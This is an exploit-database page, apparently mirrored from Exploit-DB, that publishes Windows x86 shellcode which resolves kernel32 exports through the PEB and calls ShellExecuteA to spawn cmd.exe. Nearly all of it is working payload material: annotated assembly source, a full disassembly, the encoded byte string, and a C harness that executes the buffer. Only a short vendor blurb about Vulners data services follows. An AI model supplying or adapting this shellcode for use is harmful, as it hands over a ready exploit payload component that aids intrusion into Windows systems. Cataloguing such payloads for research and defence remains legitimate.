Vulners
Lucene search
Windows x86 ShellExecuteANULL,NULL,"cmd.exe",NULL,NULL,1 Shellcode
🗓️ 22 Jun 2016 00:00:00Reported by Roziul Hasan Khan ShifatType 
exploitdb🔗 www.exploit-db.com👁 29 Views
/*
# Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode
# Date : 22-06-2016
# Author : Roziul Hasan Khan Shifat
# Tested on : Windows 7,10 x86
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;EAX=PEB
mov eax,[eax+0xc] ;EAX=PEB->Ldr
mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList
lodsd ; EAX=ntdll.dll
xchg eax,esi ;EAX=ESI , ESI=EAX
lodsd ; EAX=Third(kernel32)
mov ebx,[eax+0x10] ;PVOID Dllbase (base address)
;-------------------------------
mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header
mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress
add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY)
mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames
xor ecx,ecx
;-----------------------
Get_func:
inc ecx ;increment the ordinal
lodsd ;Get name offset
add eax,ebx ;(offset+kernel32.dll base adress)=Get function name
cmp dword [eax],0x50746547 ;GetP
jnz Get_func
cmp dword [eax+0x4],0x41636f72 ;rocA
jnz Get_func
cmp dword [eax+0x8],0x65726464 ;ddre
jnz Get_func
;---------------------
mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals
add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
mov cx,[esi+ecx*2] ;CX=Number of Function
dec ecx
mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
add esi,ebx ;ESI=beginning of Address table
mov edx,[esi+ecx*4];EDX=Pointer(offset)
add edx,ebx ;Edx=GetProcAddress
;-----------------------------
xor esi,esi
mov esi,edx ;backup of GetProcAddress
xor edi,edi
mov edi,ebx
;--------------
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ebx ;address of kernel32.dll
call edx
add esp,12
;-----------------
xor ecx,ecx
;finding address of ExitProcess
push 0x42737365
mov [esp+3],cl
push 0x636f7250
push 0x74697845
push esp
push edi
xor edi,edi
mov edi,eax
call esi
;----------------------------
add esp,12
;LoadLibraryA("shell32.dll")
xor ecx,ecx
push ecx
push 0x416c6c64
mov [esp+3],cl
push 0x2e32336c
push 0x6c656873
push esp
xor edx,edx
mov edx,edi ;Edx=LoadLibraryA
mov edi,eax ;edi=ExitProcess
call edx
add esp,11
;------------------
;finding address of ShellExecuteA()
xor ecx,ecx
push 0x42424241
mov [esp+1],cl
push 0x65747563
push 0x6578456c
push 0x6c656853
push esp
push eax
call esi
;-------------------
;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1);
add esp,13
xor ecx,ecx
push 0x41657865
mov [esp+3],cl
push 0x2e646d63
push esp
pop ecx
xor edx,edx
inc edx
push edx
xor edx,edx
push edx
push edx
push ecx
push edx
push edx
call eax
call edi
*/
/*
Disassembly of section .text:
00401000 <_start>:
401000: 31 c9 xor %ecx,%ecx
401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
401006: 8b 40 0c mov 0xc(%eax),%eax
401009: 8b 70 14 mov 0x14(%eax),%esi
40100c: ad lods %ds:(%esi),%eax
40100d: 96 xchg %eax,%esi
40100e: ad lods %ds:(%esi),%eax
40100f: 8b 58 10 mov 0x10(%eax),%ebx
401012: 8b 53 3c mov 0x3c(%ebx),%edx
401015: 01 da add %ebx,%edx
401017: 8b 52 78 mov 0x78(%edx),%edx
40101a: 01 da add %ebx,%edx
40101c: 8b 72 20 mov 0x20(%edx),%esi
40101f: 01 de add %ebx,%esi
401021: 31 c9 xor %ecx,%ecx
00401023 <Get_func>:
401023: 41 inc %ecx
401024: ad lods %ds:(%esi),%eax
401025: 01 d8 add %ebx,%eax
401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
40102d: 75 f4 jne 401023 <Get_func>
40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
401036: 75 eb jne 401023 <Get_func>
401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
40103f: 75 e2 jne 401023 <Get_func>
401041: 8b 72 24 mov 0x24(%edx),%esi
401044: 01 de add %ebx,%esi
401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx
40104a: 49 dec %ecx
40104b: 8b 72 1c mov 0x1c(%edx),%esi
40104e: 01 de add %ebx,%esi
401050: 8b 14 8e mov (%esi,%ecx,4),%edx
401053: 01 da add %ebx,%edx
401055: 31 f6 xor %esi,%esi
401057: 89 d6 mov %edx,%esi
401059: 31 ff xor %edi,%edi
40105b: 89 df mov %ebx,%edi
40105d: 31 c9 xor %ecx,%ecx
40105f: 51 push %ecx
401060: 68 61 72 79 41 push $0x41797261
401065: 68 4c 69 62 72 push $0x7262694c
40106a: 68 4c 6f 61 64 push $0x64616f4c
40106f: 54 push %esp
401070: 53 push %ebx
401071: ff d2 call *%edx
401073: 83 c4 0c add $0xc,%esp
401076: 31 c9 xor %ecx,%ecx
401078: 68 65 73 73 42 push $0x42737365
40107d: 88 4c 24 03 mov %cl,0x3(%esp)
401081: 68 50 72 6f 63 push $0x636f7250
401086: 68 45 78 69 74 push $0x74697845
40108b: 54 push %esp
40108c: 57 push %edi
40108d: 31 ff xor %edi,%edi
40108f: 89 c7 mov %eax,%edi
401091: ff d6 call *%esi
401093: 83 c4 0c add $0xc,%esp
401096: 31 c9 xor %ecx,%ecx
401098: 51 push %ecx
401099: 68 64 6c 6c 41 push $0x416c6c64
40109e: 88 4c 24 03 mov %cl,0x3(%esp)
4010a2: 68 6c 33 32 2e push $0x2e32336c
4010a7: 68 73 68 65 6c push $0x6c656873
4010ac: 54 push %esp
4010ad: 31 d2 xor %edx,%edx
4010af: 89 fa mov %edi,%edx
4010b1: 89 c7 mov %eax,%edi
4010b3: ff d2 call *%edx
4010b5: 83 c4 0b add $0xb,%esp
4010b8: 31 c9 xor %ecx,%ecx
4010ba: 68 41 42 42 42 push $0x42424241
4010bf: 88 4c 24 01 mov %cl,0x1(%esp)
4010c3: 68 63 75 74 65 push $0x65747563
4010c8: 68 6c 45 78 65 push $0x6578456c
4010cd: 68 53 68 65 6c push $0x6c656853
4010d2: 54 push %esp
4010d3: 50 push %eax
4010d4: ff d6 call *%esi
4010d6: 83 c4 0d add $0xd,%esp
4010d9: 31 c9 xor %ecx,%ecx
4010db: 68 65 78 65 41 push $0x41657865
4010e0: 88 4c 24 03 mov %cl,0x3(%esp)
4010e4: 68 63 6d 64 2e push $0x2e646d63
4010e9: 54 push %esp
4010ea: 59 pop %ecx
4010eb: 31 d2 xor %edx,%edx
4010ed: 42 inc %edx
4010ee: 52 push %edx
4010ef: 31 d2 xor %edx,%edx
4010f1: 52 push %edx
4010f2: 52 push %edx
4010f3: 51 push %ecx
4010f4: 52 push %edx
4010f5: 52 push %edx
4010f6: ff d0 call *%eax
4010f8: ff d7 call *%edi
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7";
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jun 2016 00:00Current